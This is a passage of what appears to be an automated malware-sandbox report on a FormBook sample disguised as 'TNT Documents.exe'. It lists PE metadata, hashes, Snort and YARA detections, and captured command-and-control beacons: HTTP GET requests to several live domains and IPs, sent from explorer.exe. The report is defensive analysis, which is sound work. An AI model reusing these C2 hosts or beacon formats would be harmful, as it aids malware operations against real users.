PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.5483150102950916
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: TNT Documents.exe
File size: 503808
MD5: f943d9ee79559042bfff9b4e55270cfa
SHA1: 7dca5c03f55ab6cbebd6bb3a8203d5c1d7516567
SHA256: 2c26343342361efe4ada7dd077f832792eb77f184ec9a6c5b8c3a8ad35dd5aaa
SHA512: c9d6bffff768eb7ff3853eeec196e21286a7d5be040c1b1dc4882cc106fd61d6d33ce24444eb77452fef33310a8d202a7568a4cf6db9c4e9b824b6d54b91cf09
SSDEEP: 12288:dIzgxqzpbqi/RAu/jlYQpYRKz7OoDxI7pIHL0i:dew2Zqi/B/Jb+IX9I7pIr0
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.9...............P.................. ........@.. ....................... ............@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x47c5be
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0xA539E86C [Sat Nov 3 17:54:52 2057 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7c56c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x7e000          0x5ac         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x80000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x7c550          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0x7a5c4       0x7a600   False     0.809814702503   data       7.56105630003    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x7e000          0x5ac         0x600     False     0.421223958333   data       4.10451869633    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x80000          0xc           0x200     False     0.044921875      data       0.0980041756627  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name         RVA      Size   Type                                                                        Language  Country
RT_VERSION   0x7e090  0x31c  data
RT_MANIFEST  0x7e3bc  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2019
Assembly Version  1.0.0.0
InternalName      kvhWV10.exe
FileVersion       1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName       ConnectFour
ProductVersion    1.0.0.0
FileDescription   ConnectFour
OriginalFilename  kvhWV10.exe

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
12/02/21-18:59:22.638450  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49794        80         192.168.2.7     51.255.30.106
12/02/21-18:59:22.638450  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49794        80         192.168.2.7     51.255.30.106
12/02/21-18:59:22.638450  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49794        80         192.168.2.7     51.255.30.106
12/02/21-18:59:43.047578  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.7     119.18.54.99
12/02/21-18:59:43.047578  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.7     119.18.54.99
12/02/21-18:59:43.047578  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.7     119.18.54.99
12/02/21-18:59:48.300111  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49822        80         192.168.2.7     34.102.136.180
12/02/21-18:59:48.300111  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49822        80         192.168.2.7     34.102.136.180
12/02/21-18:59:48.300111  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49822        80         192.168.2.7     34.102.136.180
12/02/21-18:59:48.478607  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49822      34.102.136.180  192.168.2.7
12/02/21-18:59:59.432108  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49827        80         192.168.2.7     158.69.116.156
12/02/21-18:59:59.432108  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49827        80         192.168.2.7     158.69.116.156
12/02/21-18:59:59.432108  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49827        80         192.168.2.7     158.69.116.156

Network Port Distribution

TCP Packets

Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Dec 2, 2021 18:59:22.612127066 CET  49794        80         192.168.2.7     51.255.30.106
Dec 2, 2021 18:59:22.638113976 CET  80           49794      51.255.30.106   192.168.2.7
Dec 2, 2021 18:59:22.638432980 CET  49794        80         192.168.2.7     51.255.30.106
Dec 2, 2021 18:59:22.638449907 CET  49794        80         192.168.2.7     51.255.30.106
Dec 2, 2021 18:59:22.664401054 CET  80           49794      51.255.30.106   192.168.2.7
Dec 2, 2021 18:59:22.687228918 CET  80           49794      51.255.30.106   192.168.2.7
Dec 2, 2021 18:59:22.687256098 CET  80           49794      51.255.30.106   192.168.2.7
Dec 2, 2021 18:59:22.687608004 CET  49794        80         192.168.2.7     51.255.30.106
Dec 2, 2021 18:59:22.687623978 CET  49794        80         192.168.2.7     51.255.30.106
Dec 2, 2021 18:59:22.715280056 CET  80           49794      51.255.30.106   192.168.2.7
Dec 2, 2021 18:59:27.825119019 CET  49815        80         192.168.2.7     209.17.116.163
Dec 2, 2021 18:59:30.835841894 CET  49815        80         192.168.2.7     209.17.116.163
Dec 2, 2021 18:59:36.839976072 CET  49815        80         192.168.2.7     209.17.116.163
Dec 2, 2021 18:59:36.957561016 CET  80           49815      209.17.116.163  192.168.2.7
Dec 2, 2021 18:59:36.957724094 CET  49815        80         192.168.2.7     209.17.116.163
Dec 2, 2021 18:59:36.959983110 CET  49815        80         192.168.2.7     209.17.116.163
Dec 2, 2021 18:59:37.078370094 CET  80           49815      209.17.116.163  192.168.2.7
Dec 2, 2021 18:59:37.078394890 CET  80           49815      209.17.116.163  192.168.2.7
Dec 2, 2021 18:59:37.078526974 CET  49815        80         192.168.2.7     209.17.116.163
Dec 2, 2021 18:59:37.079992056 CET  49815        80         192.168.2.7     209.17.116.163
Dec 2, 2021 18:59:37.197520971 CET  80           49815      209.17.116.163  192.168.2.7
Dec 2, 2021 18:59:42.873569965 CET  49820        80         192.168.2.7     119.18.54.99
Dec 2, 2021 18:59:43.044531107 CET  80           49820      119.18.54.99    192.168.2.7
Dec 2, 2021 18:59:43.047132015 CET  49820        80         192.168.2.7     119.18.54.99
Dec 2, 2021 18:59:43.047578096 CET  49820        80         192.168.2.7     119.18.54.99
Dec 2, 2021 18:59:43.224122047 CET  80           49820      119.18.54.99    192.168.2.7
Dec 2, 2021 18:59:43.231224060 CET  80           49820      119.18.54.99    192.168.2.7
Dec 2, 2021 18:59:43.231247902 CET  80           49820      119.18.54.99    192.168.2.7
Dec 2, 2021 18:59:43.231529951 CET  49820        80         192.168.2.7     119.18.54.99
Dec 2, 2021 18:59:43.231673956 CET  49820        80         192.168.2.7     119.18.54.99
Dec 2, 2021 18:59:43.407816887 CET  80           49820      119.18.54.99    192.168.2.7
Dec 2, 2021 18:59:48.280668020 CET  49822        80         192.168.2.7     34.102.136.180
Dec 2, 2021 18:59:48.299729109 CET  80           49822      34.102.136.180  192.168.2.7
Dec 2, 2021 18:59:48.299890041 CET  49822        80         192.168.2.7     34.102.136.180
Dec 2, 2021 18:59:48.300111055 CET  49822        80         192.168.2.7     34.102.136.180
Dec 2, 2021 18:59:48.319057941 CET  80           49822      34.102.136.180  192.168.2.7
Dec 2, 2021 18:59:48.478606939 CET  80           49822      34.102.136.180  192.168.2.7
Dec 2, 2021 18:59:48.478634119 CET  80           49822      34.102.136.180  192.168.2.7
Dec 2, 2021 18:59:48.478806019 CET  49822        80         192.168.2.7     34.102.136.180
Dec 2, 2021 18:59:48.931884050 CET  49822        80         192.168.2.7     34.102.136.180
Dec 2, 2021 18:59:48.950918913 CET  80           49822      34.102.136.180  192.168.2.7

UDP Packets

Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Dec 2, 2021 18:59:22.561023951 CET  49958        53         192.168.2.7  8.8.8.8
Dec 2, 2021 18:59:22.592832088 CET  53           49958      8.8.8.8      192.168.2.7
Dec 2, 2021 18:59:27.700095892 CET  50860        53         192.168.2.7  8.8.8.8
Dec 2, 2021 18:59:27.823506117 CET  53           50860      8.8.8.8      192.168.2.7
Dec 2, 2021 18:59:42.128535032 CET  50452        53         192.168.2.7  8.8.8.8
Dec 2, 2021 18:59:42.871825933 CET  53           50452      8.8.8.8      192.168.2.7
Dec 2, 2021 18:59:48.248903990 CET  59310        53         192.168.2.7  8.8.8.8
Dec 2, 2021 18:59:48.279051065 CET  53           59310      8.8.8.8      192.168.2.7
Dec 2, 2021 18:59:53.948990107 CET  51919        53         192.168.2.7  8.8.8.8
Dec 2, 2021 18:59:53.979896069 CET  53           51919      8.8.8.8      192.168.2.7
Dec 2, 2021 18:59:58.996303082 CET  64296        53         192.168.2.7  8.8.8.8
Dec 2, 2021 18:59:59.324498892 CET  53           64296      8.8.8.8      192.168.2.7
Dec 2, 2021 19:00:09.559422970 CET  56680        53         192.168.2.7  8.8.8.8
Dec 2, 2021 19:00:09.585350990 CET  53           56680      8.8.8.8      192.168.2.7
Dec 2, 2021 19:00:14.876486063 CET  58820        53         192.168.2.7  8.8.8.8
Dec 2, 2021 19:00:14.937154055 CET  53           58820      8.8.8.8      192.168.2.7
Dec 2, 2021 19:00:19.954091072 CET  60983        53         192.168.2.7  8.8.8.8
Dec 2, 2021 19:00:19.995712042 CET  53           60983      8.8.8.8      192.168.2.7
Dec 2, 2021 19:00:25.002089977 CET  52286        53         192.168.2.7  8.8.8.8
Dec 2, 2021 19:00:25.555591106 CET  53           52286      8.8.8.8      192.168.2.7

DNS Queries

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class
Dec 2, 2021 18:59:22.561023951 CET  192.168.2.7  8.8.8.8  0xb8d4    Standard query (0)  www.cortepuroiberico.com      A (IP address)  IN (0x0001)
Dec 2, 2021 18:59:27.700095892 CET  192.168.2.7  8.8.8.8  0x47d2    Standard query (0)  www.specialtyplastics.online  A (IP address)  IN (0x0001)
Dec 2, 2021 18:59:42.128535032 CET  192.168.2.7  8.8.8.8  0xdbef    Standard query (0)  www.metronixmedical.com       A (IP address)  IN (0x0001)
Dec 2, 2021 18:59:48.248903990 CET  192.168.2.7  8.8.8.8  0xbbe2    Standard query (0)  www.coached.info              A (IP address)  IN (0x0001)
Dec 2, 2021 18:59:53.948990107 CET  192.168.2.7  8.8.8.8  0x4020    Standard query (0)  www.pentagonpublishers.com    A (IP address)  IN (0x0001)
Dec 2, 2021 18:59:58.996303082 CET  192.168.2.7  8.8.8.8  0xe702    Standard query (0)  www.projectcentered.com       A (IP address)  IN (0x0001)
Dec 2, 2021 19:00:09.559422970 CET  192.168.2.7  8.8.8.8  0x47eb    Standard query (0)  www.functionalsoft.com        A (IP address)  IN (0x0001)
Dec 2, 2021 19:00:14.876486063 CET  192.168.2.7  8.8.8.8  0xaa06    Standard query (0)  www.viavelleiloes.online      A (IP address)  IN (0x0001)
Dec 2, 2021 19:00:19.954091072 CET  192.168.2.7  8.8.8.8  0x8197    Standard query (0)  www.pirosconsulting.com       A (IP address)  IN (0x0001)
Dec 2, 2021 19:00:25.002089977 CET  192.168.2.7  8.8.8.8  0xe1bb    Standard query (0)  www.floridanratraining.com    A (IP address)  IN (0x0001)

DNS Answers

Timestamp                           Source IP  Dest IP      Trans ID  Reply Code          Name                          CName                 Address         Type                    Class
Dec 2, 2021 18:59:22.592832088 CET  8.8.8.8    192.168.2.7  0xb8d4    No error (0)        www.cortepuroiberico.com      cortepuroiberico.com                  CNAME (Canonical name)  IN (0x0001)
Dec 2, 2021 18:59:22.592832088 CET  8.8.8.8    192.168.2.7  0xb8d4    No error (0)        cortepuroiberico.com                                51.255.30.106   A (IP address)          IN (0x0001)
Dec 2, 2021 18:59:27.823506117 CET  8.8.8.8    192.168.2.7  0x47d2    No error (0)        www.specialtyplastics.online                        209.17.116.163  A (IP address)          IN (0x0001)
Dec 2, 2021 18:59:42.871825933 CET  8.8.8.8    192.168.2.7  0xdbef    No error (0)        www.metronixmedical.com       metronixmedical.com                   CNAME (Canonical name)  IN (0x0001)
Dec 2, 2021 18:59:42.871825933 CET  8.8.8.8    192.168.2.7  0xdbef    No error (0)        metronixmedical.com                                 119.18.54.99    A (IP address)          IN (0x0001)
Dec 2, 2021 18:59:48.279051065 CET  8.8.8.8    192.168.2.7  0xbbe2    No error (0)        www.coached.info              coached.info                          CNAME (Canonical name)  IN (0x0001)
Dec 2, 2021 18:59:48.279051065 CET  8.8.8.8    192.168.2.7  0xbbe2    No error (0)        coached.info                                        34.102.136.180  A (IP address)          IN (0x0001)
Dec 2, 2021 18:59:53.979896069 CET  8.8.8.8    192.168.2.7  0x4020    Name error (3)      www.pentagonpublishers.com    none                  none            A (IP address)          IN (0x0001)
Dec 2, 2021 18:59:59.324498892 CET  8.8.8.8    192.168.2.7  0xe702    No error (0)        www.projectcentered.com       projectcentered.com                   CNAME (Canonical name)  IN (0x0001)
Dec 2, 2021 18:59:59.324498892 CET  8.8.8.8    192.168.2.7  0xe702    No error (0)        projectcentered.com                                 158.69.116.156  A (IP address)          IN (0x0001)
Dec 2, 2021 19:00:09.585350990 CET  8.8.8.8    192.168.2.7  0x47eb    No error (0)        www.functionalsoft.com                              74.208.236.210  A (IP address)          IN (0x0001)
Dec 2, 2021 19:00:14.937154055 CET  8.8.8.8    192.168.2.7  0xaa06    Server failure (2)  www.viavelleiloes.online      none                  none            A (IP address)          IN (0x0001)
Dec 2, 2021 19:00:19.995712042 CET  8.8.8.8    192.168.2.7  0x8197    Name error (3)      www.pirosconsulting.com       none                  none            A (IP address)          IN (0x0001)
Dec 2, 2021 19:00:25.555591106 CET  8.8.8.8    192.168.2.7  0xe1bb    Server failure (2)  www.floridanratraining.com    none                  none            A (IP address)          IN (0x0001)

HTTP Request Dependency Graph

• www.cortepuroiberico.com
• www.specialtyplastics.online
• www.metronixmedical.com
• www.coached.info

HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.7  49794        51.255.30.106   80                C:\Windows\explorer.exe

Timestamp                           kBytes transferred  Direction  Data
Dec 2, 2021 18:59:22.638449907 CET  14538               OUT        GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1
Host: www.cortepuroiberico.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Dec 2, 2021 18:59:22.687228918 CET  14538               IN         HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Thu, 02 Dec 2021 17:59:22 GMT
Content-Type: text/html
Content-Length: 150
Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.7  49815        209.17.116.163  80                C:\Windows\explorer.exe

Timestamp                           kBytes transferred  Direction  Data
Dec 2, 2021 18:59:36.959983110 CET  14601               OUT        GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1
Host: www.specialtyplastics.online
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Dec 2, 2021 18:59:37.078370094 CET  14601               IN         HTTP/1.1 400 Bad Request
Server: openresty/1.19.9.1
Date: Thu, 02 Dec 2021 17:59:37 GMT
Content-Type: text/html
Content-Length: 163
Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.7  49820        119.18.54.99    80                C:\Windows\explorer.exe

Timestamp                           kBytes transferred  Direction  Data
Dec 2, 2021 18:59:43.047578096 CET  14603               OUT        GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1
Host: www.metronixmedical.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Dec 2, 2021 18:59:43.231224060 CET  14603               IN         HTTP/1.1 302 Found
Date: Thu, 02 Dec 2021 17:59:43 GMT
Server: Apache
Location: https://metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 74 72 6f 6e 69 78 6d 65 64 69 63 61 6c 2e 63 6f 6d 2f 68 6f 77 36 2f 3f 69 4e 39 74 46 42 3d 65 4f 37 41 4b 35 55 54 53 75 71 54 63 6f 58 41 45 34 4a 4b 50 74 35 74 4f 42 76 36 6e 6e 6d 50 6b 30 4d 32 47 30 49 53 70 49 4f 34 6a 57 77 47 77 48 6c 67 44 77 4d 6e 47 58 42 35 53 66 4b 6f 6c 33 55 65 67 58 43 5a 70 67 3d 3d 26 61 6d 70 3b 34 68 3d 37 6e 5f 44 52 4a 47 78 6e 52 64 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&amp;4h=7n_DRJGxnRd">here</a>.</p></body></html>


                                                                  Session ID: 3
                                                                  Source IP: 192.168.2.7
                                                                  Source Port: 49822
                                                                  Destination IP: 34.102.136.180
                                                                  Destination Port: 80
                                                                  Process: C:\Windows\explorer.exe
                                                                  Timestamp: Dec 2, 2021 18:59:48.300111055 CET
                                                                  kBytes transferred: 14611
                                                                  Direction: OUT
                                                                  Data: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1
                                                                  Host: www.coached.info
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp: Dec 2, 2021 18:59:48.478606939 CET
                                                                  kBytes transferred: 14611
                                                                  Direction: IN
                                                                  Data: HTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Thu, 02 Dec 2021 17:59:48 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "61a4f026-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior


                                                                  System Behavior

                                                                  General

                                                                  Start time:18:57:47
                                                                  Start date:02/12/2021
                                                                  Path:C:\Users\user\Desktop\TNT Documents.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\TNT Documents.exe"
                                                                  Imagebase:0x70000
                                                                  File size:503808 bytes
                                                                  MD5 hash:F943D9EE79559042BFFF9B4E55270CFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:18:57:59
                                                                  Start date:02/12/2021
                                                                  Path:C:\Users\user\Desktop\TNT Documents.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:{path}
                                                                  Imagebase:0x130000
                                                                  File size:503808 bytes
                                                                  MD5 hash:F943D9EE79559042BFFF9B4E55270CFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Start time:18:58:01
                                                                  Start date:02/12/2021
                                                                  Path:C:\Users\user\Desktop\TNT Documents.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:{path}
                                                                  Imagebase:0xaa0000
                                                                  File size:503808 bytes
                                                                  MD5 hash:F943D9EE79559042BFFF9B4E55270CFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
